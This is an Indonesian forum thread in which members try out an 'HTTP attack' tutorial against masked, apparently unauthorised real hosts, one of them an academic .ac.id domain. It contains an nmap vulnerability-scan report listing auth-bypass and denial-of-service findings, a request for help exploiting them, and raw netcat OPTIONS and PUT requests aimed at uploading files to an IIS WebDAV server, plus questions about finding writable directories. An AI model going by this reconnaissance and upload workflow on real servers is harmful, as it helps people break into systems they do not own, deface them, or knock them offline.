HTTP ATTACK

**penjamoen** · 06-09-2013, 10:01 PM

(05-27-2012, 02:47 AM)nesta Wrote: punya ane malah gak jalan om

Code:
nesta@Tengtop:~$ nc -vv xxx.ac.id usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port] [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [hostname] [port[s]] nesta@Tengtop:~$

padahal netcatnya udah ane install

ane juga dulu kayak gini , kalau nda salah versi netcat nya beda , itu yg freebsd , coba install cn.tradisional kang Big Grin

**hexadecimal** · 06-10-2013, 09:43 AM

wah serem juga lo om Big Grin

izin praktek..

**afrihhilal** · 07-03-2013, 12:03 PM

om... ane mau tanya nih..
kan ane abis scan target pake nmap..
lah ntu ada keluaranya kek gini..

Code:
nmap -Pn --script=vuln -T3 xxx.xxx.xxx.xxx

Starting Nmap 6.25 ( http://nmap.org ) at 2013-07-01 23:10 WIT

Nmap scan report for xxx.xxx.xxx.xxx

Host is up (1.4s latency).

Not shown: 935 filtered ports, 59 closed ports

PORT     STATE SERVICE

21/tcp   open  ftp

80/tcp   open  http

|_http-frontpage-login: false

222/tcp  open  rsh-spx

8000/tcp open  http-alt

|_http-frontpage-login: false

|_http-git: 0

|_http-huawei-hg5xx-vuln: false

| http-litespeed-sourcecode-download: 

| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)

| /index.php source code:

| <HTML><HEAD><TITLE>SHOUTcast Server</TITLE></HEAD><BODY><H3>Invalid resource</H3>

|_</BODY></HTML>

|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)

[color=#FFD700]| http-method-tamper: 

|   VULNERABLE:

|   Authentication bypass by HTTP verb tampering

|     State: VULNERABLE (Exploitable)

|     Description:

|       This web server contains password protected resources vulnerable to authentication bypass 

|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the

|        common HTTP methods and in misconfigured .htaccess files.

|              

|     Extra information:

|       

|   URIs suspected to be vulnerable to HTTP verb tampering:

|     /admin.cgi [HEAD]

|   

|     References:

|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29

|       http://www.imperva.com/resources/glossary/http_verb_tampering.html

|       http://capec.mitre.org/data/definitions/274.html

|_      http://www.mkit.com.ar/labs/htexploit/[/color]

[color=#FFD700]| http-slowloris-check: 

|   VULNERABLE:

|   Slowloris DOS attack

|     State: VULNERABLE

|     Description:

|       Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.

|       It accomplishes this by opening connections to the target web server and sending a partial request. By doing 

|       so, it starves the http server's resources causing Denial Of Service. 

|               

|     Disclosure date: 2009-09-17

|     References:

|_      http://ha.ckers.org/slowloris/[/color]

|_http-vuln-cve2010-0738: false

8001/tcp open  vcom-tunnel

8080/tcp open  http-proxy

| http-enum: 

|_  /phpmyadmin/: phpMyAdmin

|_http-frontpage-login: false

| http-vuln-cve2011-3192: 

|   VULNERABLE:

|   Apache byterange filter DoS

|     State: VULNERABLE

|     IDs:  CVE:CVE-2011-3192  OSVDB:74721

|     Description:

|       The Apache web server is vulnerable to a denial of service attack when numerous

|       overlapping byte ranges are requested.

|     Disclosure date: 2011-08-19

|     References:

|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192

|       http://osvdb.org/74721

|       http://nessus.org/plugins/index.php?view=single&id=55976

|_      http://seclists.org/fulldisclosure/2011/Aug/175

| http-vuln-cve2011-3368: 

|_  ERROR: Got no answers from pipelined queries

Host script results:

|_firewall-bypass: false

nah ntu exploitnya gimana om?? kan ada yang vulnerable tuh...
bantuin dong om... :-bd

**sikecil** · 07-07-2013, 11:36 PM

mantap om

semoga berfanfaat buat ane Smile

hehehhehehe

**bakiyak** · 07-11-2013, 01:49 PM

pengguna baru-->is me
Teruskan om..
Jangan bosan-bosan berbagi ilmu..
Smile

**M1+5C** · 08-19-2013, 07:08 PM

thx udah share om, udah ane coba, jadinya gini

Code:
root@m1+5c:~# nc -vv xxx.xxx.xxx.xxx 80

xxx.xxx.xxx.xxx: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [xxx.xxx.xxx.xxx] 80 (www) open

OPTIONS / HTTP/1.1

Host: xxx.xxx.xxx.xxx

HTTP/1.1 200 OK

Date: Mon, 19 Aug 2013 10:41:15 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

MS-Author-Via: DAV

Content-Length: 0

Accept-Ranges: none

DASL: <DAV:sql>

DAV: 1, 2

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK

Cache-Control: private

trus ane coba PUT, gini hasilnya nya

Code:
root@m1+5c:~# nc -vv xxx.xxx.xxx.xxx 80

xxx.xxx.xxx.xxx: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [xxx.xxx.xxx.xxx] 80 (www) open

PUT /test.txt HTTP/1.1

Host: xxx.xxx.xxx.xxx

Content-Length: 10

xxxxxxxxxx   

HTTP/1.1 400 Bad Request

Content-Type: text/html

Date: Mon, 19 Aug 2013 11:00:38 GMT

Connection: close

Content-Length: 42

<h1>Bad Request (Invalid Header Name)</h1> sent 74, rcvd 171

itu, apanya yang salah om?trus, gimana caranya kita mengetahui direktory tersebut permission 777 atau tidak?

**dictatorkid** · 08-27-2013, 12:25 PM

Nice Info bro... Big Grin

★Salam Dari Bumi Minang★

**wandx** · 09-01-2013, 12:50 AM

klo abis di ketik OPTIONS bla..bla..bla gt cm kluar
sent 37, rcvd 406 knape bang?hehehe

**icaruz** · 09-11-2013, 09:22 AM

hmmmm nyimak dulu masih blum di coba si >_<

**djabeaxc** · 09-11-2013, 10:02 PM

makasih om cukup membantu \m/\m/\m/\m/\m/ :-bd:-bd:-bd:-bd:-bd:-bd